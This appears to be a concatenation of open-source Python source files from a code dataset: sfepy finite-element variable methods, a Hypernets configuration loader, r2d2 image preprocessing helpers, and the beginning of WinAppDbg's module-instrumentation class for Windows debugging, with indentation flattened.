Get DOFs of the variable in the given region.
Parameters
----------
region : Region
The selected region.
reshape : bool
If True, reshape the DOF vector to a 2D array with the individual
components as columns. Otherwise a 1D DOF array of the form [all
DOFs in region node 0, all DOFs in region node 1, ...] is returned.
step : int, default 0
The time step (0 means current, -1 previous, ...).
Returns
-------
out : array
The selected DOFs.
"""
nods = self.field.get_dofs_in_region(region, merge=True)
eq = nm.empty((len(nods) * self.n_components,), dtype=nm.int32)
for idof in range(self.n_components):
eq[idof::self.n_components] = self.n_components * nods \
+ idof + self.indx.start
out = self.data[step][eq]
if reshape:
out.shape = (len(nods), self.n_components)
return out
def apply_ebc(self, vec, offset=0, force_values=None):
"""
Apply essential (Dirichlet) and periodic boundary conditions to
vector `vec`, starting at `offset`.
"""
eq_map = self.eq_map
ii = offset + eq_map.eq_ebc
# EBC,
if force_values is None:
vec[ii] = eq_map.val_ebc
else:
if isinstance(force_values, dict):
vec[ii] = force_values[self.name]
else:
vec[ii] = force_values
# EPBC.
vec[offset+eq_map.master] = vec[offset+eq_map.slave]
def apply_ic(self, vec, offset=0, force_values=None):
"""
Apply initial conditions conditions to vector `vec`, starting at
`offset`.
"""
ii = slice(offset, offset + self.n_dof)
if force_values is None:
vec[ii] = self.get_initial_condition()
else:
if isinstance(force_values, dict):
vec[ii] = force_values[self.name]
else:
vec[ii] = force_values
def get_reduced(self, vec, offset=0, follow_epbc=False):
"""
Get the reduced DOF vector, with EBC and PBC DOFs removed.
Notes
-----
The full vector starts in `vec` at `offset`. If 'follow_epbc' is True,
values of EPBC master DOFs are not simply thrown away, but added to the
corresponding slave DOFs, just like when assembling. For vectors with
state (unknown) variables it should be set to False, for assembled
vectors it should be set to True.
"""
eq_map = self.eq_map
ii = offset + eq_map.eqi
r_vec = vec[ii]
if follow_epbc:
master = offset + eq_map.master
slave = eq_map.eq[eq_map.slave]
ii = slave >= 0
la.assemble1d(r_vec, slave[ii], vec[master[ii]])
return r_vec
def get_full(self, r_vec, r_offset=0, force_value=None,
vec=None, offset=0):
"""
Get the full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Notes
-----
The reduced vector starts in `r_vec` at `r_offset`.
Passing a `force_value` overrides the EBC values. Optionally,
`vec` argument can be provided to store the full vector (in
place) starting at `offset`.
"""
if vec is None:
vec = nm.empty(self.n_dof, dtype=r_vec.dtype)
else:
vec = vec[offset:offset+self.n_dof]
eq_map = self.eq_map
r_vec = r_vec[r_offset:r_offset+eq_map.n_eq]
# EBC.
vec[eq_map.eq_ebc] = get_default(force_value, eq_map.val_ebc)
# Reduced vector values.
vec[eq_map.eqi] = r_vec
# EPBC.
vec[eq_map.master] = vec[eq_map.slave]
unused_dofs = self.field.get('unused_dofs')
if unused_dofs is not None:
vec[:] = self.field.restore_substituted(vec)
return vec
def create_output(self, vec=None, key=None, extend=True, fill_value=None,
linearization=None):
"""
Convert the DOF vector to a dictionary of output data usable by
Mesh.write().
Parameters
----------
vec : array, optional
An alternative DOF vector to be used instead of the variable
DOF vector.
key : str, optional
The key to be used in the output dictionary instead of the
variable name.
extend : bool
Extend the DOF values to cover the whole domain.
fill_value : float or complex
The value used to fill the missing DOF values if `extend` is True.
linearization : Struct or None
The linearization configuration for higher order approximations.
"""
linearization = get_default(linearization, Struct(kind='strip'))
if vec is None:
vec = self()
key = get_default(key, self.name)
aux = nm.reshape(vec,
(self.n_dof // self.n_components, self.n_components))
out = self.field.create_output(aux, self.name, dof_names=self.dofs,
key=key, extend=extend,
fill_value=fill_value,
linearization=linearization)
return out
def get_element_diameters(self, cells, mode, square=False):
"""Get diameters of selected elements."""
field = self.field
domain = field.domain
cells = nm.array(cells)
diameters = nm.empty((cells.shape[0],), dtype=nm.float64)
integral = Integral('i_tmp', 1)
vg, _ = field.get_mapping(field.region, integral, 'volume')
diameters = domain.get_element_diameters(cells, vg, mode, square=square)
return diameters
def save_as_mesh(self, filename):
"""
Save the field mesh and the variable values into a file for
visualization. Only the vertex values are stored.
"""
mesh = self.field.create_mesh(extra_nodes=False)
vec = self()
n_nod, n_dof, dpn = mesh.n_nod, self.n_dof, self.n_components
aux = nm.reshape(vec, (n_dof // dpn, dpn))
ext = self.field.extend_dofs(aux, 0.0)
out = {}
if self.field.approx_order != 0:
out[self.name] = Struct(name='output_data',
mode='vertex', data=ext,
var_name=self.name, dofs=self.dofs)
else:
ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
out[self.name] = Struct(name='output_data',
mode='cell', data=ext,
var_name=self.name, dofs=self.dofs)
mesh.write(filename, io='auto', out=out)
def has_same_mesh(self, other):
"""
Returns
-------
flag : int
The flag can be either 'different' (different meshes), 'deformed'
(slightly deformed same mesh), or 'same' (same).
"""
f1 = self.field
f2 = other.field
c1 = f1.get_coor()
c2 = f2.get_coor()
if c1.shape != c2.shape:
flag = 'different'
else:
eps = 10.0 * nm.finfo(nm.float64).eps
if nm.allclose(c1, c2, rtol=eps, atol=0.0):
flag = 'same'
elif nm.allclose(c1, c2, rtol=0.1, atol=0.0):
flag = 'deformed'
else:
flag = 'different'
return flag
def get_interp_coors(self, strategy='interpolation', interp_term=None):
"""
Get the physical coordinates to interpolate into, based on the strategy
used.
"""
if strategy == 'interpolation':
coors = self.field.get_coor()
elif strategy == 'projection':
region = self.field.region
integral = Integral(term=interp_term)
coors = get_physical_qps(region, integral)
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
return coors
def evaluate_at(self, coors, mode='val', strategy='general',
close_limit=0.1, get_cells_fun=None,
cache=None, ret_cells=False,
ret_status=False, ret_ref_coors=False, verbose=False):
"""
Evaluate the variable in the given physical coordinates. Convenience
wrapper around :func:`Field.evaluate_at()
<sfepy.discrete.common.fields.Field.evaluate_at()>`, see its
docstring for more details.
"""
source_vals = self().reshape((self.n_nod, self.n_components))
out = self.field.evaluate_at(coors, source_vals,
mode=mode,
strategy=strategy,
close_limit=close_limit,
get_cells_fun=get_cells_fun,
cache=cache,
ret_cells=ret_cells,
ret_status=ret_status,
ret_ref_coors=ret_ref_coors,
verbose=verbose)
return out
def set_from_other(self, other, strategy='projection', close_limit=0.1):
"""
Set the variable using another variable. Undefined values (e.g. outside
the other mesh) are set to numpy.nan, or extrapolated.
Parameters
----------
strategy : 'projection' or 'interpolation'
The strategy to set the values: the L^2 orthogonal projection (not
implemented!), or a direct interpolation to the nodes (nodal
elements only!)
Notes
-----
If the other variable uses the same field mesh, the coefficients are
set directly.
"""
flag_same_mesh = self.has_same_mesh(other)
if flag_same_mesh == 'same':
self.set_data(other())
return
if strategy == 'interpolation':
coors = self.get_interp_coors(strategy)
elif strategy == 'projection':
## interp_term = Term() # TODO
## coors = self.get_interp_coors(strategy, interp_term)
pass
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
vals = other.evaluate_at(coors, strategy='general',
close_limit=close_limit)
if strategy == 'interpolation':
self.set_data(vals)
elif strategy == 'projection':
raise NotImplementedError('unsupported strategy! (%s)' % strategy)
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
class DGFieldVariable(FieldVariable):
"""
Fieald variable specificaly intended for use with DGFields, bypasses
application of EBC and EPBC as this is done in DGField.
Is instance checked in create_adof_conns.
"""
def __init__(self, name, kind, field, order=None, primary_var_name=None,
special=None, flags=None, history=None, **kwargs):
FieldVariable.__init__(self, name, kind, field, order=order,
primary_var_name=primary_var_name,
special=special, flags=flags,
history=history, **kwargs)
from sfepy.discrete.dg.fields import DGField
if isinstance(field, DGField):
pass
else:
raise ValueError("Attempted to use DGFieldVariable with non DGField!")
def apply_ebc(self, vec, offset=0, force_values=None):
pass
def get_full(self, r_vec, r_offset=0, force_value=None,
vec=None, offset=0):
"""
Get the full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Notes
-----
The reduced vector starts in `r_vec` at `r_offset`.
Passing a `force_value` overrides the EBC values. Optionally,
`vec` argument can be provided to store the full vector (in
place) starting at `offset`.
"""
if vec is None:
vec = nm.empty(self.n_dof, dtype=r_vec.dtype)
else:
vec = vec[offset:offset+self.n_dof]
eq_map = self.eq_map
r_vec = r_vec[r_offset:r_offset+eq_map.n_eq]
# overide to hotfix second application of EBCs
# # EBC.
# vec[eq_map.eq_ebc] = get_default(force_value, eq_map.val_ebc)
# Reduced vector values, for DG this is full vector as eq_map.eq
# contains all dofs, cf. create_adof_conns
vec[eq_map.eqi] = r_vec
# EPBC.
# vec[eq_map.master] = vec[eq_map.slave]
unused_dofs = self.field.get('unused_dofs')
if unused_dofs is not None:
vec[:] = self.field.restore_substituted(vec)
return vec |
hypernets/conf/_configuration.py | Enpen/Hypernets | 1,080 | 11195071 | <reponame>Enpen/Hypernets
import glob
import os
import sys
from traitlets import Unicode
from traitlets.config import Application, Configurable
class Configuration(Application):
config_dir = Unicode('./conf',
help='The file system directory which contains all configuration files'
).tag(config=True)
aliases = {
'log-level': 'Application.log_level',
'config-dir': 'Configuration.config_dir',
}
def __init__(self, **kwargs):
super(Configuration, self).__init__(**kwargs)
aliases_keys = self.aliases.keys()
argv = [a for a in sys.argv if any([a.startswith(f'--{k}') for k in aliases_keys])]
super(Configuration, self).initialize(argv)
if len(self.config_dir) > 0:
config_dir = os.path.abspath(os.path.expanduser(self.config_dir))
for f in glob.glob(f'{config_dir}/*.py', recursive=False):
self.load_config_file(f)
_conf = Configuration()
generate_config_file = _conf.generate_config_file
def configure():
"""
Annotation utility to configure one configurable class
"""
def wrapper(c):
assert issubclass(c, Configurable)
o = c(parent=_conf)
if c not in _conf.classes:
_conf.classes += [c]
return o
return wrapper
def configure_and_observe(obj, observe_names, observe_handle):
"""
Annotation utility to configure one configurable class and observe it (or other configured one)
"""
assert (obj is None or isinstance(obj, Configurable)) \
and callable(observe_handle) \
and isinstance(observe_names, (tuple, list, str))
def wrapper_and_observe(c):
assert issubclass(c, Configurable)
o = c(parent=_conf)
if c not in _conf.classes:
_conf.classes += [c]
names = observe_names if isinstance(observe_names, (tuple, list)) else [observe_names]
if obj is None:
o.observe(observe_handle, names)
else:
obj.observe(observe_handle, names)
return o
return wrapper_and_observe
def observe(obj, names, handle):
"""
A utility to observe configured object
"""
assert isinstance(obj, Configurable) and callable(handle) \
and isinstance(names, (tuple, list, str))
names = names if isinstance(names, (tuple, list)) else [names]
obj.observe(handle, names)
return obj
|
fewshots/data/utils.py | bertinetto/r2d2 | 111 | 11195075 | <gh_stars>100-1000
from PIL import Image
import torch
import numpy as np
from torchvision import transforms
normalize_mini_t = transforms.Normalize(mean=[x / 255.0 for x in [120.39586422, 115.59361427, 104.54012653]],
std=[x / 255.0 for x in [70.68188272, 68.27635443, 72.54505529]])
normalize_cifar_t = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],
std=[x / 255.0 for x in [63.0, 62.1, 66.7]])
def nop(d):
return d
def load_image_path(key, out_field, d):
d[out_field] = Image.open(d[key])
return d
def to_tensor(key, d):
d[key] = transforms.functional.to_tensor(d[key])
return d
def convert_tensor(key, d):
d[key] = 1.0 - torch.from_numpy(np.array(d[key], np.float32, copy=False)).transpose(0, 1).contiguous().view(1, d[
key].size[0], d[key].size[1])
return d
def rotate_image(key, rot, d):
d[key] = d[key].rotate(rot)
return d
def scale_image(key, height, width, d):
d[key] = d[key].resize((height, width))
return d
def crop(key, crop_transforms, max_crop_shrink, d):
transform_id = np.random.randint(max_crop_shrink)
d[key] = crop_transforms[transform_id](d[key])
return d
def normalize_mini_image(key, d):
d[key] = normalize_mini_t(d[key])
return d
def normalize_cifar_image(key, d):
d[key] = normalize_cifar_t(d[key])
return d
|
venv/Lib/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py | ajayiagbebaku/NFL-Model | 695 | 11195083 | #!~/.wine/drive_c/Python25/python.exe
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Module instrumentation.
@group Instrumentation:
Module
@group Warnings:
DebugSymbolsWarning
"""
from __future__ import with_statement
__revision__ = "$Id$"
__all__ = ['Module', 'DebugSymbolsWarning']
import sys
from winappdbg import win32
from winappdbg import compat
from winappdbg.textio import HexInput, HexDump
from winappdbg.util import PathOperations
# delayed imports
Process = None
import os
import warnings
import traceback
#==============================================================================
class DebugSymbolsWarning (UserWarning):
"""
This warning is issued if the support for debug symbols
isn't working properly.
"""
#==============================================================================
class Module (object):
"""
Interface to a DLL library loaded in the context of another process.
@group Properties:
get_base, get_filename, get_name, get_size, get_entry_point,
get_process, set_process, get_pid,
get_handle, set_handle, open_handle, close_handle
@group Labels:
get_label, get_label_at_address, is_address_here,
resolve, resolve_label, match_name
@group Symbols:
load_symbols, unload_symbols, get_symbols, iter_symbols,
resolve_symbol, get_symbol_at_address
@group Modules snapshot:
clear
@type unknown: str
@cvar unknown: Suggested tag for unknown modules.
@type lpBaseOfDll: int
@ivar lpBaseOfDll: Base of DLL module.
Use L{get_base} instead.
@type hFile: L{FileHandle}
@ivar hFile: Handle to the module file.
Use L{get_handle} instead.
@type fileName: str
@ivar fileName: Module filename.
Use L{get_filename} instead.
@type SizeOfImage: int
@ivar SizeOfImage: Size of the module.
Use L{get_size} instead.
@type EntryPoint: int
@ivar EntryPoint: Entry point of the module.
Use L{get_entry_point} instead.
@type process: L{Process}
@ivar process: Process where the module is loaded.
Use the L{get_process} method instead.
"""
unknown = '<unknown>'
class _SymbolEnumerator (object):
"""
Internally used by L{Module} to enumerate symbols in a module.
"""
def __init__(self, undecorate = False):
self.symbols = list()
self.undecorate = undecorate
def __call__(self, SymbolName, SymbolAddress, SymbolSize, UserContext):
"""
Callback that receives symbols and stores them in a Python list.
"""
if self.undecorate:
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
pass # not all symbols are decorated!
self.symbols.append( (SymbolName, SymbolAddress, SymbolSize) )
return win32.TRUE
def __init__(self, lpBaseOfDll, hFile = None, fileName = None,
SizeOfImage = None,
EntryPoint = None,
process = None):
"""
@type lpBaseOfDll: str
@param lpBaseOfDll: Base address of the module.
@type hFile: L{FileHandle}
@param hFile: (Optional) Handle to the module file.
@type fileName: str
@param fileName: (Optional) Module filename.
@type SizeOfImage: int
@param SizeOfImage: (Optional) Size of the module.
@type EntryPoint: int
@param EntryPoint: (Optional) Entry point of the module.
@type process: L{Process}
@param process: (Optional) Process where the module is loaded.
"""
self.lpBaseOfDll = lpBaseOfDll
self.fileName = fileName
self.SizeOfImage = SizeOfImage
self.EntryPoint = EntryPoint
self.__symbols = list()
self.set_handle(hFile)
self.set_process(process)
# Not really sure if it's a good idea...
## def __eq__(self, aModule):
## """
## Compare two Module objects. The comparison is made using the process
## IDs and the module bases.
##
## @type aModule: L{Module}
## @param aModule: Another Module object.
##
## @rtype: bool
## @return: C{True} if the two process IDs and module bases are equal,
## C{False} otherwise.
## """
## return isinstance(aModule, Module) and \
## self.get_pid() == aModule.get_pid() and \
## self.get_base() == aModule.get_base()
def get_handle(self):
"""
@rtype: L{Handle}
@return: File handle.
Returns C{None} if unknown.
"""
# no way to guess!
return self.__hFile
def set_handle(self, hFile):
"""
@type hFile: L{Handle}
@param hFile: File handle. Use C{None} to clear.
"""
if hFile == win32.INVALID_HANDLE_VALUE:
hFile = None
self.__hFile = hFile
hFile = property(get_handle, set_handle, doc="")
def get_process(self):
"""
@rtype: L{Process}
@return: Parent Process object.
Returns C{None} if unknown.
"""
# no way to guess!
return self.__process
def set_process(self, process = None):
"""
Manually set the parent process. Use with care!
@type process: L{Process}
@param process: (Optional) Process object. Use C{None} for no process.
"""
if process is None:
self.__process = None
else:
global Process # delayed import
if Process is None:
from winappdbg.process import Process
if not isinstance(process, Process):
msg = "Parent process must be a Process instance, "
msg += "got %s instead" % type(process)
raise TypeError(msg)
self.__process = process
process = property(get_process, set_process, doc="")
def get_pid(self):
"""
@rtype: int or None
@return: Parent process global ID.
Returns C{None} on error.
"""
process = self.get_process()
if process is not None:
return process.get_pid()
def get_base(self):
"""
@rtype: int or None
@return: Base address of the module.
Returns C{None} if unknown.
"""
return self.lpBaseOfDll
def get_size(self):
"""
@rtype: int or None
@return: Base size of the module.
Returns C{None} if unknown.
"""
if not self.SizeOfImage:
self.__get_size_and_entry_point()
return self.SizeOfImage
def get_entry_point(self):
"""
@rtype: int or None
@return: Entry point of the module.
Returns C{None} if unknown.
"""
if not self.EntryPoint:
self.__get_size_and_entry_point()
return self.EntryPoint
def __get_size_and_entry_point(self):
"Get the size and entry point of the module using the Win32 API."
process = self.get_process()
if process:
try:
handle = process.get_handle( win32.PROCESS_VM_READ |
win32.PROCESS_QUERY_INFORMATION )
base = self.get_base()
mi = win32.GetModuleInformation(handle, base)
self.SizeOfImage = mi.SizeOfImage
self.EntryPoint = mi.EntryPoint
except WindowsError:
e = sys.exc_info()[1]
warnings.warn(
"Cannot get size and entry point of module %s, reason: %s"\
% (self.get_name(), e.strerror), RuntimeWarning)
def get_filename(self):
"""
@rtype: str or None
@return: Module filename.
Returns C{None} if unknown.
"""
if self.fileName is None:
if self.hFile not in (None, win32.INVALID_HANDLE_VALUE):
fileName = self.hFile.get_filename()
if fileName:
fileName = PathOperations.native_to_win32_pathname(fileName)
self.fileName = fileName
return self.fileName
def __filename_to_modname(self, pathname):
"""
@type pathname: str
@param pathname: Pathname to a module.
@rtype: str
@return: Module name.
"""
filename = PathOperations.pathname_to_filename(pathname)
if filename:
filename = filename.lower()
filepart, extpart = PathOperations.split_extension(filename)
if filepart and extpart:
modName = filepart
else:
modName = filename
else:
modName = pathname
return modName
def get_name(self):
"""
@rtype: str
@return: Module name, as used in labels.
@warning: Names are B{NOT} guaranteed to be unique.
If you need unique identification for a loaded module,
use the base address instead.
@see: L{get_label}
"""
pathname = self.get_filename()
if pathname:
modName = self.__filename_to_modname(pathname)
if isinstance(modName, compat.unicode):
try:
modName = modName.encode('cp1252')
except UnicodeEncodeError:
e = sys.exc_info()[1]
warnings.warn(str(e))
else:
modName = "0x%x" % self.get_base()
return modName
def match_name(self, name):
"""
@rtype: bool
@return:
C{True} if the given name could refer to this module.
It may not be exactly the same returned by L{get_name}.
"""
# If the given name is exactly our name, return True.
# Comparison is case insensitive.
my_name = self.get_name().lower()
if name.lower() == my_name:
return True
# If the given name is a base address, compare it with ours.
try:
base = HexInput.integer(name)
except ValueError:
base = None
if base is not None and base == self.get_base():
return True
# If the given name is a filename, convert it to a module name.
# Then compare it with ours, case insensitive.
modName = self.__filename_to_modname(name)
if modName.lower() == my_name:
return True
# No match.
return False
#------------------------------------------------------------------------------
def open_handle(self):
"""
Opens a new handle to the module.
The new handle is stored in the L{hFile} property.
"""
if not self.get_filename():
msg = "Cannot retrieve filename for module at %s"
msg = msg % HexDump.address( self.get_base() )
raise Exception(msg)
hFile = win32.CreateFile(self.get_filename(),
dwShareMode = win32.FILE_SHARE_READ,
dwCreationDisposition = win32.OPEN_EXISTING)
# In case hFile was set to an actual handle value instead of a Handle
# object. This shouldn't happen unless the user tinkered with hFile.
if not hasattr(self.hFile, '__del__'):
self.close_handle()
self.hFile = hFile
def close_handle(self):
"""
Closes the handle to the module.
@note: Normally you don't need to call this method. All handles
created by I{WinAppDbg} are automatically closed when the garbage
collector claims them. So unless you've been tinkering with it,
setting L{hFile} to C{None} should be enough.
"""
try:
if hasattr(self.hFile, 'close'):
self.hFile.close()
elif self.hFile not in (None, win32.INVALID_HANDLE_VALUE):
win32.CloseHandle(self.hFile)
finally:
self.hFile = None
def get_handle(self):
"""
@rtype: L{FileHandle}
@return: Handle to the module file.
"""
if self.hFile in (None, win32.INVALID_HANDLE_VALUE):
self.open_handle()
return self.hFile
def clear(self):
"""
Clears the resources held by this object.
"""
try:
self.set_process(None)
finally:
self.close_handle()
#------------------------------------------------------------------------------
# XXX FIXME
# I've been told sometimes the debugging symbols APIs don't correctly
# handle redirected exports (for example ws2_32!recv).
# I haven't been able to reproduce the bug yet.
def load_symbols(self):
"""
Loads the debugging symbols for a module.
Automatically called by L{get_symbols}.
"""
if win32.PROCESS_ALL_ACCESS == win32.PROCESS_ALL_ACCESS_VISTA:
dwAccess = win32.PROCESS_QUERY_LIMITED_INFORMATION
else:
dwAccess = win32.PROCESS_QUERY_INFORMATION
hProcess = self.get_process().get_handle(dwAccess)
hFile = self.hFile
BaseOfDll = self.get_base()
SizeOfDll = self.get_size()
Enumerator = self._SymbolEnumerator()
try:
win32.SymInitialize(hProcess)
SymOptions = win32.SymGetOptions()
SymOptions |= (
win32.SYMOPT_ALLOW_ZERO_ADDRESS |
win32.SYMOPT_CASE_INSENSITIVE |
win32.SYMOPT_FAVOR_COMPRESSED |
win32.SYMOPT_INCLUDE_32BIT_MODULES |
win32.SYMOPT_UNDNAME
)
SymOptions &= ~(
win32.SYMOPT_LOAD_LINES |
win32.SYMOPT_NO_IMAGE_SEARCH |
win32.SYMOPT_NO_CPP |
win32.SYMOPT_IGNORE_NT_SYMPATH
)
win32.SymSetOptions(SymOptions)
try:
win32.SymSetOptions(
SymOptions | win32.SYMOPT_ALLOW_ABSOLUTE_SYMBOLS)
except WindowsError:
pass
try:
try:
success = win32.SymLoadModule64(
hProcess, hFile, None, None, BaseOfDll, SizeOfDll)
except WindowsError:
success = 0
if not success:
ImageName = self.get_filename()
success = win32.SymLoadModule64(
hProcess, None, ImageName, None, BaseOfDll, SizeOfDll)
if success:
try:
win32.SymEnumerateSymbols64(
hProcess, BaseOfDll, Enumerator)
finally:
win32.SymUnloadModule64(hProcess, BaseOfDll)
finally:
win32.SymCleanup(hProcess)
except WindowsError:
e = sys.exc_info()[1]
msg = "Cannot load debug symbols for process ID %d, reason:\n%s"
msg = msg % (self.get_pid(), traceback.format_exc(e))
warnings.warn(msg, DebugSymbolsWarning)
self.__symbols = Enumerator.symbols
def unload_symbols(self):
"""
Unloads the debugging symbols for a module.
"""
self.__symbols = list()
def get_symbols(self):
"""
Returns the debugging symbols for a module.
The symbols are automatically loaded when needed.
@rtype: list of tuple( str, int, int )
@return: List of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
if not self.__symbols:
self.load_symbols()
return list(self.__symbols)
def iter_symbols(self):
"""
Returns an iterator for the debugging symbols in a module,
in no particular order.
The symbols are automatically loaded when needed.
@rtype: iterator of tuple( str, int, int )
@return: Iterator of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
if not self.__symbols:
self.load_symbols()
return self.__symbols.__iter__()
def resolve_symbol(self, symbol, bCaseSensitive = False):
"""
Resolves a debugging symbol's address.
@type symbol: str
@param symbol: Name of the symbol to resolve.
@type bCaseSensitive: bool
@param bCaseSensitive: C{True} for case sensitive matches,
C{False} for case insensitive.
@rtype: int or None
@return: Memory address of symbol. C{None} if not found.
"""
if bCaseSensitive:
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName:
return SymbolAddress
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
continue
if symbol == SymbolName:
return SymbolAddress
else:
symbol = symbol.lower()
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName.lower():
return SymbolAddress
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
continue
if symbol == SymbolName.lower():
return SymbolAddress
def get_symbol_at_address(self, address):
"""
Tries to find the closest matching symbol for the given address.
@type address: int
@param address: Memory address to query.
@rtype: None or tuple( str, int, int )
@return: Returns a tuple consisting of:
- Name
- Address
- Size (in bytes)
Returns C{None} if no symbol could be matched.
"""
found = None
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if SymbolAddress > address:
continue
if SymbolAddress + SymbolSize > address:
if not found or found[1] < SymbolAddress:
found = (SymbolName, SymbolAddress, SymbolSize)
return found
#------------------------------------------------------------------------------
def get_label(self, function = None, offset = None):
"""
Retrieves the label for the given function of this module or the module
base address if no function name is given.
@type function: str
@param function: (Optional) Exported function name.
@type offset: int
@param offset: (Optional) Offset from the module base address.
@rtype: str
@return: Label for the module base address, plus the offset if given.
"""
return _ModuleContainer.parse_label(self.get_name(), function, offset)
def get_label_at_address(self, address, offset = None):
"""
Creates a label from the given memory address.
If the address belongs to the module, the label is made relative to
it's base address.
@type address: int
@param address: Memory address.
@type offset: None or int
@param offset: (Optional) Offset value.
@rtype: str
@return: Label pointing to the given address.
"""
# Add the offset to the address.
if offset:
address = address + offset
# Make the label relative to the base address if no match is found.
module = self.get_name()
function = None
offset = address - self.get_base()
# Make the label relative to the entrypoint if no other match is found.
# Skip if the entry point is unknown.
start = self.get_entry_point()
if start and start <= address:
function = "start"
offset = address - start
# Enumerate exported functions and debug symbols,
# then find the closest match, if possible.
try:
symbol = self.get_symbol_at_address(address)
if symbol:
(SymbolName, SymbolAddress, SymbolSize) = symbol
new_offset = address - SymbolAddress
if new_offset <= offset:
function = SymbolName
offset = new_offset
except WindowsError:
pass
# Parse the label and return it.
return _ModuleContainer.parse_label(module, function, offset)
def is_address_here(self, address):
"""
Tries to determine if the given address belongs to this module.
@type address: int
@param address: Memory address.
@rtype: bool or None
@return: C{True} if the address belongs to the module,
C{False} if it doesn't,
and C{None} if it can't be determined.
"""
base = self.get_base()
size = self.get_size()
if base and size:
return base <= address < (base + size)
return None
def resolve(self, function):
"""
Resolves a function exported by this module.
@type function: str or int
@param function:
str: Name of the function.
int: Ordinal of the function.
@rtype: int
@return: Memory address of the exported function in the process.
Returns None on error.
"""
# Unknown DLL filename, there's nothing we can do.
filename = self.get_filename()
if not filename:
return None
# If the DLL is already mapped locally, resolve the function.
try:
hlib = win32.GetModuleHandle(filename)
address = win32.GetProcAddress(hlib, function)
except WindowsError:
# Load the DLL locally, resolve the function and unload it.
try:
hlib = win32.LoadLibraryEx(filename,
win32.DONT_RESOLVE_DLL_REFERENCES)
try:
address = win32.GetProcAddress(hlib, function)
finally:
win32.FreeLibrary(hlib)
except WindowsError:
return None
# A NULL pointer means the function was not found.
if address in (None, 0):
return None
# Compensate for DLL base relocations locally and remotely.
return address - hlib + self.lpBaseOfDll
def resolve_label(self, label):
"""
Resolves a label for this module only. If the label refers to another
module, an exception is raised.
@type label: str
@param label: Label to resolve.
@rtype: int
@return: Memory address pointed to by the label.
@raise ValueError: The label is malformed or impossible to resolve.
@raise RuntimeError: Cannot resolve the module or function.
"""
# Split the label into it's components.
# Use the fuzzy mode whenever possible.
aProcess = self.get_process()
if aProcess is not None:
(module, procedure, offset) = aProcess.split_label(label)
else:
(module, procedure, offset) = _ModuleContainer.split_label(label)
# If a module name is given that doesn't match ours,
# raise an exception.
if module and not self.match_name(module):
raise RuntimeError("Label does not belong to this module")
# Resolve the procedure if given.
if procedure:
address = self.resolve(procedure)
if address is None:
# If it's a debug symbol, use the symbol.
address = self.resolve_symbol(procedure)
# If it's the keyword "start" use the entry point.
if address is None and procedure == "start":
address = self.get_entry_point()
# The procedure was not found.
if address is None:
if not module:
module = self.get_name()
msg = "Can't find procedure %s in module %s"
raise RuntimeError(msg % (procedure, module))
# If no procedure is given use the base address of the module.
else:
address = self.get_base()
# Add the offset if given and return the resolved address.
if offset:
address = address + offset
return address
#==============================================================================
# TODO
# An alternative approach to the toolhelp32 snapshots: parsing the PEB and
# fetching the list of loaded modules from there. That would solve the problem
# of toolhelp32 not working when the process hasn't finished initializing.
# See: http://pferrie.host22.com/misc/lowlevel3.htm
class _ModuleContainer (object):
"""
Encapsulates the capability to contain Module objects.
@note: Labels are an approximated way of referencing memory locations
across different executions of the same process, or different processes
with common modules. They are not meant to be perfectly unique, and
some errors may occur when multiple modules with the same name are
loaded, or when module filenames can't be retrieved.
@group Modules snapshot:
scan_modules,
get_module, get_module_bases, get_module_count,
get_module_at_address, get_module_by_name,
has_module, iter_modules, iter_module_addresses,
clear_modules
@group Labels:
parse_label, split_label, sanitize_label, resolve_label,
resolve_label_components, get_label_at_address, split_label_strict,
split_label_fuzzy
@group Symbols:
load_symbols, unload_symbols, get_symbols, iter_symbols,
resolve_symbol, get_symbol_at_address
@group Debugging:
is_system_defined_breakpoint, get_system_breakpoint,
get_user_breakpoint, get_breakin_breakpoint,
